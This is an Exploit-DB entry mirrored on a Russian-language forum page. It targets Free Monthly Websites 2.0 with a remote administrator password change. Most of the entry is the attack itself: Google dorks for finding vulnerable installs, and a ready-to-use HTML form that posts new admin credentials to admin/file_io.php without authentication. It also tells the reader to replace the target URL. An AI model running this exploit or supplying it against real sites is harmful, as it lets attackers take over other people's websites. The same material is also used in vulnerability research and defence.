- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 24953
- Проверка EDB
-
- Пройдено
- Автор
- YASSIN ABOUKIR
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- null
- Дата публикации
- 2013-04-12
Free Monthly Websites 2.0 - Admin Password Change
Код:
==========================================================================================
# Title : Free Monthly Websites 2.0 Administrator Remote Password Change
# Date : 10/04/2013
# Name : Free Monthly Websites
# Affected Version : 2.0
# Vendor : http://www.freemonthlywebsites2.com/
# Category : Web applications
# Severity : High
# Tested on : Firefox | Google Chrome | Internet Explorer
# Dorks : inurl:/index_ebay.php | "Powered by: Resell Rights Fortune" | Powered By: Free Monthly Websites 2.0
# About the software : Free Monthly Websites 2.0 is here and you no longer have to worry about editing complicated HTML code as we have taken care of that for you, and you no longer have to worry about anything to do with website design as we have taken care of that for you too, adding your Google AdSense Publisher code, taken care of, ClickBank! All done for you, here's how it works. (taken from the vendor's page)
==========================================================================================
# Author : Yassin Aboukir
# Contact : Yaaboukir [At] Gmail [Dot] com
# Site : www.y-aboukir.info
# Greetz : To All Ethical Hackers!
==========================================================================================
# Proof of concept :
Vulnerable page : http://target.com/[path]/admin/file_io.php
<form name="frm" action="file_io.php" method="post" onSubmit="return chk()">
<input type="hidden" name="do_type" value="admin_settings_write">
# How to exploit :
- Change http://www.target.com/[path]/ to the link of target website.
<html>
<head><title>Free Monthly Websites 2.0 | Remote Admin password Change</title></head>
<body>
<td width="645" align="center" valign="top"><table width="645" border="0" align="center" cellpadding="0" cellspacing="0">
<form name="frm" action="http://www.target.com/[path]/admin/file_io.php" method="post" onSubmit="return chk()">
<input type="hidden" name="do_type" value="admin_settings_write">
<tr>
<td height="100" colspan="2" align="center" valign="middle">
<font color="#808080"><b><font size="5">Free Monthly Websites 2.0 |</font><font size="6"> </font></b> <font size="4">Remote Admin password Change</font></font></td>
</tr>
<tr>
<td width="300" height="50" align="center" valign="middle">
<font color="#808080">New Username:</font>
</td>
<td width="345" height="50" align="left" valign="middle"><input name="user_name" type="text" size="40"> </td>
</tr>
</td>
<tr>
<td width="300" height="62" align="center" valign="middle">
<font color="#808080">New Password: </font> </td>
<td width="345" height="62" align="left" valign="middle"><input name="password" type="text" size="40"> </td>
</tr>
<tr>
<td height="50" colspan="2" align="center" valign="middle" ><p>
<input type="submit" name="Submit" value="Save" style="font-weight: 700"><br>
</td>
</tr>
<tr>
<td height="50" colspan="2" align="center" valign="middle" class="main2"><p>Author<b> : </b>
<a href="http://www.y-aboukir.info/" style="text-decoration: none">
<font color="#000000">Yassin ABOUKIR</font></a></p></td>
</tr>
</body>
<html>
- Источник
- www.exploit-db.com